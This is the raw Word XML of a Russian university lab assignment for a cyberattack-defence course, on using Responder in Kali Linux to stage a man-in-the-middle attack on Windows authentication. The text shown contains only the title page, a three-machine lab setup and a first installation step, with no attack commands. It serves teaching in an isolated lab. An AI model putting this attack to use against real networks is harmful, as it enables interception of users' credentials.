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C934D" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50EB96E3" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">МИНИСТЕРСТВО НАУКИ И ВЫСШЕГО ОБРАЗОВАНИЯ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790858DB" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t>РОССИЙСКОЙ ФЕДЕРАЦИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5045B3F5" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:pStyle w:val="afc"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:t xml:space="preserve">ФГБОУ ВО «НАЦИОНАЛЬНЫЙ ИССЛЕДОВАТЕЛЬСКИЙ УНИВЕРСИТЕТ «МЭИ» </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D159526" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60078FCB" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1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Cs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Факультет/институт</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Инженерно-экономический институт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D245968" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1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 w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                                                  (название факультета/института)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1686AB86" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1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Cs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кафедра</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«</w:t>
      </w:r>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Безопасности и информационных технологий»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476EE4C2" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1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 w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:rStyle w:val="FontStyle17"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            (название кафедры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044ABF58" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:pStyle w:val="Style4"/>
        <w:widowControl/>
        <w:tabs>
          <w:tab w:val="left" w:pos="13500"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429B56C7" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C5CF8E4" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75C5328B" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2930F808" w14:textId="49A80C77" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Лабораторная работа № </w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A8165C" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="280A9D89" w14:textId="35776F2B" w:rsidR="00B54F4E" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D648EC">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Дисциплина</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Технологии защиты информационных систем от кибератак</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F333B4">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изучение возможностей применения инструмента</w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E" w:rsidRPr="00B54F4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B54F4E" w:rsidRPr="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в ОС </w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E" w:rsidRPr="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> для выполнения </w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E" w:rsidRPr="00B54F4E">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-12"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>атаки человек-посередине в отношении методов аутентификации в Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096E9DE5" w14:textId="3A4A4A3D" w:rsidR="00CB42F1" w:rsidRPr="00F333B4" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73ABFED4" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285C0467" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D21A0C8" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr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356"/>
        <w:gridCol w:w="351"/>
        <w:gridCol w:w="149"/>
        <w:gridCol w:w="356"/>
        <w:gridCol w:w="629"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="955"/>
        <w:gridCol w:w="7"/>
        <w:gridCol w:w="25"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CB42F1" w14:paraId="4B128325" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2692" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E220FCB" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120"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В</w:t>
            </w:r>
            <w:r w:rsidRPr="00D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>ыполнил студент</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3BC4B165" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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994" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03D63095" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D648EC">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>курса</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB42F1" w:rsidRPr="00260D0B" w14:paraId="03A297BD" w14:textId="77777777" w:rsidTr="002F76F7">
        <w:trPr>
          <w:gridAfter w:val="2"/>
          <w:wAfter w:w="32" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4788" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="203DF311" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00260D0B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260D0B">
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>очно-заочной формы обучения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB42F1" w14:paraId="2128C318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0FA3E8DB" w14:textId="77777777" w:rsidR="00CB42F1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Группа</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> №:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1E28E012" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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ИЭ-41-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB42F1" w14:paraId="3B5801C5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33D13E2B" w14:textId="77777777" w:rsidR="00CB42F1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ФИО</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8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4AD846" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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</w:tr>
      <w:tr w:rsidR="00CB42F1" w14:paraId="47E2C281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3A48C4A6" w14:textId="77777777" w:rsidR="00CB42F1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Проверил</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="14ACE53B" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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</w:tr>
      <w:tr w:rsidR="00CB42F1" w14:paraId="4FAF80FE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614C9FEF" w14:textId="77777777" w:rsidR="00CB42F1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ФИО</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53A08231" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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Дратвяк А.В.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB42F1" w14:paraId="2BFF20F2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1AF47F65" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC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 xml:space="preserve">дата </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>проверки:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="356" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="30C8077B" w14:textId="77777777" w:rsidR="00CB42F1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«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="50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D3BF98" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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356" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4A69EFC0" w14:textId="77777777" w:rsidR="00CB42F1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»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="636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1F882B" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1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962" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1DB7B749" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120" w:line="24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2020г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB42F1" w14:paraId="584D33ED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759FAAF1" w14:textId="77777777" w:rsidR="00CB42F1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Оценка</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2810" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="096DE740" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1" w:rsidP="002F76F7">
            <w:pPr>
              <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24CDF559" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C4A208A" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRPr="00D648EC" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CF135F" w14:textId="77777777" w:rsidR="00CB42F1" w:rsidRDefault="00CB42F1" w:rsidP="00CB42F1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3DC12765" w14:textId="3A6C8275" w:rsidR="00F51ABF" w:rsidRDefault="00634D6D" w:rsidP="00B54F4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F51ABF" w:rsidRPr="00F51ABF">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Базовая настройка домена</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0841251A" w14:textId="6DA8BD7B" w:rsidR="00B54F4E" w:rsidRDefault="00634D6D" w:rsidP="00B54F4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Для начала выполнения основной части лабораторной работы необходимо установить и настроить все компоненты учебного стенда, а именно три виртуальные машины:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1670828C" w14:textId="2A38D53F" w:rsidR="00634D6D" w:rsidRPr="00634D6D" w:rsidRDefault="00634D6D" w:rsidP="002F76F7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ОС </w:t>
      </w:r>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows 7 Pro SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB026F5" w14:textId="754CECFA" w:rsidR="00634D6D" w:rsidRPr="00514A72" w:rsidRDefault="00634D6D" w:rsidP="002F76F7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00514A72">
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows Server 2008 R2 SP1 x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232C34E6" w14:textId="3DE5F54C" w:rsidR="00634D6D" w:rsidRPr="00634D6D" w:rsidRDefault="00634D6D" w:rsidP="002F76F7">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2020.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>live</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00634D6D">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> x64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E70DC2" w14:textId="292C5594" w:rsidR="00634D6D" w:rsidRDefault="00634D6D" w:rsidP="009A06FD">
      <w:r>
        <w:t>Этапы выполнения лабораторной работы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3611128D" w14:textId="4FFB66F2" w:rsidR="009A06FD" w:rsidRDefault="009A06FD" w:rsidP="009A06FD">
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Установить</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00663CEF">
        <w:t>2008</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SP</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidR="002C2E51">
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidR="00634D6D">
        <w:t>виртуальную машину</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F3508D" w14:textId="67DADE13" w:rsidR="00634D6D" w:rsidRPr="001A62A9" w:rsidRDefault="00634D6D" w:rsidP="009A06FD">
      <w:r>
        <w:t xml:space="preserve">Обратите внимание на рекомендуемые установки для ОС в настройках создаваемой виртуальной машины – объем жесткого диска и виртуальной памяти, которые можно узнать на официальном сайте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52865B23" w14:textId="485A17BE" w:rsidR="00663CEF" w:rsidRPr="00EB4790" w:rsidRDefault="00663CEF" w:rsidP="00663CEF">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
